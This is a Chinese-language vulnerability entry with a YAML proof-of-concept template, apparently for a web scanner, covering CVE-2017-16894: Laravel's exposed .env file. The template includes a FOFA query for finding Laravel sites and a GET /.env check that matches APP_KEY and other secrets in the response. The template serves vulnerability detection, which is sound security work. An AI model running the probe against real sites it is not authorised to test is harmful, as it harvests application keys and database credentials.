漏洞描述
Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息
根据泄露敏感信息严重程度,定性是中危或高危
fofa: app="Laravel-Framework"
CVE-2017-16894: Laravel .env 配置文件泄露
PoC代码[已公开]
id: CVE-2017-16894
info:
name: Laravel .env 配置文件泄露
author: zan8in
severity: high
description: |-
Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息
根据泄露敏感信息严重程度,定性是中危或高危
fofa: app="Laravel-Framework"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-16894
tags: cve,cve2017,laravel,env,leak
created: 2023/08/10
rules:
r0:
request:
method: GET
path: /.env
expression: response.status == 200 && response.body.bcontains(b'APP_NAME=Laravel') && response.body.bcontains(b'APP_ENV=') && response.body.bcontains(b'APP_KEY=')
expression: r0()